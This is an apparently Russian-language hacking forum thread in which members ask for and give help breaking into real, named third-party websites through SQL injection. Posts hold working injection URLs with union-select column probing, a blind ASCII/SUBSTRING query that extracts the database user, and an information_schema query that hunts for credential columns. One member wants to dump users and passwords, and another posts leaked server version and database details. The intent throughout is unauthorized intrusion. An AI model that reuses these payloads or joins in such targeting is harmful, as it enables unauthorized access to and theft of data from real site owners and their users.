Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. it's mу

    it's mу Banned

    Joined:
    12 Feb 2009
    Messages:
    47
    Likes Received:
    32
    Reputations:
    5
    jokester там нет второй переменной, исходя из твоего поста и моих соображений, то навряд-ли что-то можно сделать в данной ситуации :( на счет функции ReRe её я сделал что бы показать какие символы на что меняются, т.е. логически исходя из моего поста, в твой запрос pass='&name=)+or+1=1/* неверен, ни по символам, ни по ситуации, так как переменная одна. Для просящих все таки выложу ссылочку, может быть кто-то умнее меня :( miniubka.cc/pay1.php?partner=2&video=index.php
     
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):
    /add
    имхо в запрос попадает &apos (в html &apos а при просмотре ')

    /add2
    Shadow6120, линк в студию/пм
     
    #5582 l1ght, 23 Feb 2009
    Last edited: 23 Feb 2009
    1 person likes this.
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    l1ght Бинго, вы перешли на второй уровень :D
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Есть сайт на асп(судя по всему MSSQL ;) ), ощибки базы данных не выводятся... но есть слепая инъекция, как я думаю.

    script.asp?id=853 - контент показывается

    script.asp?id=853' - контент не показывается

    script.asp?id=853+order+by+8-- - подобрал колонки, их восемь.

    script.asp?id=853+union+select+null,null,null,null,null,null,null,null-- ничего не выводиться, в том числе контент.

    Как быть с этим? Подбирать тип колонок вручную? или что то еще можно?
    И вообще, правильно ли я рассуждал?
     
  5. it's mу

    it's mу Banned

    Joined:
    12 Feb 2009
    Messages:
    47
    Likes Received:
    32
    Reputations:
    5
    Дело в том что выше постами было установлено, что апостроф фильтруется, а как я говорил ' это сделано для того, что бы красиво было глазам смотреть на "удавшийся" инъект. Вообще спасибо тебе за помощь, но ничего сделать нельзя так как апостроф нужно в любом случаю, что бы удовлетворить логику запроса :(
     
    1 person likes this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    непонятная скуля.. да еще и сайт не быстр принайме у меня..
    а как у вас? )
     
    2 people like this.
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.whimit.com/forum_read.php?f=17
    Invalid query: db_query - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and g.id=gb.id order by g.id' at line 1

    А больше хрен че добьешся... Все фильтрует че только можно даже group by или внатуре фиг поймешь..
     
  8. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    184
    Reputations:
    0
    __www.dpstyle.com.ua
    не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл. Где они вообще могут быть?
     
  9. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    budden, этот вопрос не для раздела уязвимости!
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    вообще сайт бажный какой-то

    1. Там с нормальными параметрами не работает:

    Code:
    http://www.whimit.com/forum_read.php?f=17&id=75739
    2.
    Code:
    http://www.whimit.com/album_list.php?username=inmate051877lol
     
  11. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    В админке смотрел? ;)

    В БД


    phpOracleAdmin - ищи в гугле ;)
     
    1 person likes this.
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://lit.1september.ru/urok/index.php?SubjectID=100010'

    Помогите, вроде скуля, а не крутится...
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 wildshaman


    http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((select+user()),18,1))=x


    я нашел слепухy

    Version : 5.1.30-log
    Database : dblit
    User : webuser@localhost
     
    1 person likes this.
  14. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Респект)
    А как версию, юзера и Дб вытянул?
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули
     
  16. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    О, спс, про блинды не читал...
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://www.dnastar.com/support/FAQs1.php?faqid=-1

    Не могу вытащить юзеров и пароли ихнее
    а точнее вытащил из таблицы user
    колонку username токо =\
    дальше чет не могу так как все там перерыл
     
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    diznt, там при логине не пароль просят, а какой-то номер (Subscriber Number)

    http://www.dnastar.com/support/FAQs1.php?faqid=-10+union+select+1,2,group_concat(column_name,0x2F,table_name),4,5,6+from+information_schema.columns+where+column_name+like+'%num%'/*

    ssnum/forms

    может что-то из этого .. проверь на всякий случай.




    2sabe

    http://www.whimit.com/forum_read.php?f=17&id=75739+and+substring(version(),1,1)=4

    версия 4.0. Подзапросов нет .. поковыряю еще насчет юниона
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    в таблице user такие колонки там

     
  20. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,2,3/* вроде инъекция... Но не выводит. Прошу помочь.
     
Thread Status:
Not open for further replies.